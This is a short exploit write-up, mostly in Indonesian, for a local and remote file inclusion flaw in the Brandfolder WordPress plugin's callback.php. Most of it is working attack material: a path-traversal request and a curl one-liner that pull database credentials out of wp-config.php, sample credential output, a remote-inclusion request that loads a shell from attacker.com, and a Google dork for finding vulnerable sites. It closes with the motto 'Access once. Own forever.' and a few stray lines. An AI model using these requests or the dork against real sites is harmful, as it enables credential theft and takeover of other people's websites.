Brandfolder WordPress Plugin – Remote File Inclusion / Local File Inclusion (LFI / RFI)
Overview
Plugin: Brandfolder
Vulnerability: Remote File Inclusion / Local File Inclusion
Severity: High (CVSS 7.5)
Summary
Brandfolder plugin WordPress memiliki celah pada parameter wp_abspath di file callback.php.
User dapat mengatur path file yang akan di-include tanpa filtering, menyebabkan:
- Local file inclusion (membaca file penting seperti
wp-config.php) - Remote file inclusion (jika
allow_url_includeaktif di server)
Vulnerable Endpoint
/wp-content/plugins/brandfolder/callback.php
Proof of Concept (PoC)
Local File Inclusion (LFI)
GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1 Host: target.com
Sample cURL Command
curl -s "https://target.com/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00" | grep -Ei 'DB_NAME|DB_PASSWORD|DB_USER'
Expected Result
define( 'DB_NAME', 'dbname' ); define( 'DB_USER', 'dbuser' ); define( 'DB_PASSWORD', 'dbpass' ); define( 'DB_HOST', 'localhost' );
Advanced Exploitation (Optional RFI)
Jika server mengizinkan allow_url_include:
GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=http://attacker.com/shell.txt%00 HTTP/1.1 Host: target.com
Impact
- Disclosure database credentials.
- Potential full WordPress compromise.
- Optional RCE jika
allow_url_includeaktif.
Detection
- Log access ke
callback.phpdengan parameterwp_abspath. - Pola traversal path seperti
../../../pada URL. - Response berisi sensitive data seperti
DB_PASSWORD.
Google Dork for Hunting
inurl:"/wp-content/plugins/brandfolder/callback.php"
References
Closing
Satu parameter injection, satu file bocor, satu WordPress runtuh. Dari database credentials, attacker bisa mengambil alih situs sepenuhnya.
Motto: Access once. Own forever.
hi
hello